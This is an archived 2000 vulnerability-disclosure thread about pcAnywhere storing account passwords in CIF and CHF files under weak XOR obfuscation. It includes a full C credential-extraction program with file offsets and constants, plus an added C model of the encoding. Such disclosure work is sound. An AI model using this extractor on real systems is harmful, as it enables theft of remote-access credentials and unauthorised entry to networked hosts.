Vulnerability Development mailing list archives
Re: pcAnywhere weak passwords encryption in configuration files
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Thu, 4 May 2000 15:48:06 -0700
Pascal, it could be that where the passwords are being used, XOR is as strong as is possible -- if the passwords are being saved as a convenience for the client, then any way they store the password is necessarily going to be equivalent to XOR unless they store the passwords encrypted with a secret known only by the user -- and if they are being stored as a convenience, asking the user for a secret isn't going to be convenient. However, if this is on the server end of things (i.e., it authenticates users) then storing the passwords in a XOR form is simply poor taste, poor design, and poor security. Perhaps Symantec could comment to either vuln-dev or bugtraq wrt how they use their passwords, especially since there seem to be many in their user community that feel passwords are being handled insecurely.

* Pascal Longpre <longprep () HOTMAIL COM> [000504 15:32]:
Another pcAnywhere vulnerability...

--- Discussion ---

PcAnywhere uses a trivial password encryption scheme (XOR based, again!!!) to store account and password information in the configuration file. CIF files are used to store callers' information and CHF files are used to record remote slaves' information (username, pw and domain) in order to automate the process of logging in. A second level of protection (protect item password) has also been added on those files to protect the viewing of properties.

In a network environment, the CIF files are usually stored on a centralized file server for easier management and every slave must have read access to them. Having access to CIF information can give an attacker a way to access any waiting pcAnywhere host on that network.

In CHF files, even if you uncheck the "Automatically login to host..." option, the first character of every field is replaced with a space but the rest of the field's information remains in the file.

--- Solution ---

Symantec suggests the use of the public key encryption option. I'm told this is poorly documented. I never saw anyone use this. They also suggest using any third party encryption software but I don't see how this can fit in a network environment.

--- Exploit ---

The following program will extract the username, password and the Protect Item password from any CIF or CHF file. It should work fine with versions 7.5 to 9.2.

// pcax - pcAnywhere password extraction program
// This program extracts account information from CIF and CHF files.
//
// Written by Pascal Longpre (longprep () hotmail com)
// Date : April 27th, 2000
// Tested on pcAnywhere version 7.5 to 9.2

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   // exit()
#include <string.h>   // strstr(), memset()

int main(int argc, char **argv)
{
    char szBuffer[3072];
    char UserName[33], Password[17], Pw2[16];   // one extra byte for the terminator
    int i, BytesRead;
    FILE *stream;

    printf("pcax - pcAnywhere password extractor\n");
    printf("Written by Pascal Longpre - longprep () hotmail com \n");
    printf("\n");

    if (argc < 2) {
        printf("USAGE : pcax filename\n");
        printf(" where filename is any .cif or .chf file\n");
        printf("\n");
        exit(1);
    }

    // Open the file in binary mode (read-only: the file is never written)
    stream = fopen(argv[1], "rb");
    if (stream == NULL) {
        printf("Cannot open %s\n", argv[1]);
        exit(1);
    }
    memset(szBuffer, 0, sizeof(szBuffer));   // zero-fill in case the file is short
    BytesRead = fread(szBuffer, 1, 3072, stream);
    fclose(stream);

    // Every plaintext byte is the XOR of two consecutive stored bytes and a
    // fixed per-position constant, so no key is needed to recover it.

    // Extract CIF file account information
    if (strstr(argv[1], ".cif") != NULL || strstr(argv[1], ".CIF") != NULL) {
        for (i = 0; i < 32; i++)
            UserName[i] = szBuffer[0x1cc + i - 1] ^ szBuffer[0x1cc + i] ^ (0xF + i);
        UserName[32] = '\0';
        printf("Username :%s\n", UserName);
        for (i = 0; i < 16; i++)
            Password[i] = szBuffer[0x24d + i - 1] ^ szBuffer[0x24d + i] ^ (0x90 + i);
        Password[16] = '\0';
        printf("User password :%s\n", Password);
    }

    // Extract CHF file account information
    if (strstr(argv[1], ".chf") != NULL || strstr(argv[1], ".CHF") != NULL) {
        for (i = 0; i < 32; i++)
            UserName[i] = szBuffer[0x82d + i - 1] ^ szBuffer[0x82d + i] ^ (0x70 + i);
        UserName[32] = '\0';
        printf("Username :%s\n", UserName);
        for (i = 1; i < 15; i++)
            Password[i - 1] = szBuffer[0x8ad + i - 1] ^ szBuffer[0x8ad + i] ^ (0xf0 + i);
        Password[14] = '\0';
        printf("Password :%s\n", Password);
    }

    // Protected item password - Same offset for both files
    for (i = 0; i < 16; i++)
        Pw2[i] = szBuffer[0x118 + i - 1] ^ szBuffer[0x118 + i] ^ (0x17 + i);
    Pw2[15] = '\0';
    printf("Protected item password :%s\n", Pw2);

    return 0;
}
// The end

Thanks to Justin Somaini (reilly () speakeasy org) for giving me the idea to investigate those config. files.

Pascal Longpre (longprep () hotmail com)
--
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
'Netscape engineers are weenies!' -- Microsoft
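To make concrete what both posts say about the XOR scheme, here is an added C model of the chained XOR obfuscation that the pcax extractor above reverses (example code written for this archive page, not Pascal's program or anything from Symantec; the field offset 0x10, the chaining byte 0x5a and the per-position constant 0x90 are constructed for illustration). It shows that decoding needs no secret at all, only read access to the file, and that blanking just the first character of a field, as the post describes for CHF files when auto-login is unchecked, leaves the rest of the credential recoverable.

```c
#include <string.h>

#define FIELD_LEN 16

/* Stored byte = previous stored byte XOR plaintext byte XOR (base + i).
   base is a constant built into the program, not a user secret; buf[off-1] is
   the chaining byte, so off must be >= 1. Plaintext is zero padded. */
static void field_encode(unsigned char *buf, size_t off, unsigned char base, const char *plain)
{
    size_t i, n = strlen(plain);
    for (i = 0; i < FIELD_LEN; i++) {
        unsigned char p = (i < n) ? (unsigned char)plain[i] : 0;
        buf[off + i] = buf[off + i - 1] ^ p ^ (unsigned char)(base + i);
    }
}

/* The inverse: the per-byte operation pcax performs. No key, only read access. */
static void field_decode(const unsigned char *buf, size_t off, unsigned char base, char *out)
{
    size_t i;
    for (i = 0; i < FIELD_LEN; i++)
        out[i] = (char)(buf[off + i - 1] ^ buf[off + i] ^ (unsigned char)(base + i));
    out[FIELD_LEN] = '\0';
}

/* Model of unchecking "Automatically login to host...": only the first
   plaintext character becomes a space, the rest is stored again as before. */
static void field_blank_first(unsigned char *buf, size_t off, unsigned char base)
{
    char tmp[FIELD_LEN + 1];
    field_decode(buf, off, base, tmp);
    tmp[0] = ' ';
    field_encode(buf, off, base, tmp);
}

/* Round trip on a constructed buffer (offset 0x10, constant 0x90 and chaining
   byte 0x5a are assumed values). Returns 1 when the credential is readable
   both before and after the auto-login option is turned off. */
int demo(char *recovered, char *after_blank)
{
    unsigned char buf[64] = {0};
    buf[0x0f] = 0x5a;
    field_encode(buf, 0x10, 0x90, "s3cret!");
    field_decode(buf, 0x10, 0x90, recovered);
    field_blank_first(buf, 0x10, 0x90);
    field_decode(buf, 0x10, 0x90, after_blank);
    return strcmp(recovered, "s3cret!") == 0 && strcmp(after_blank, " 3cret!") == 0;
}
```

The same round trip holds for any base constant and chaining byte, which is why Seth's point stands: without a secret supplied by the user, any reversible storage of the password is equivalent to this.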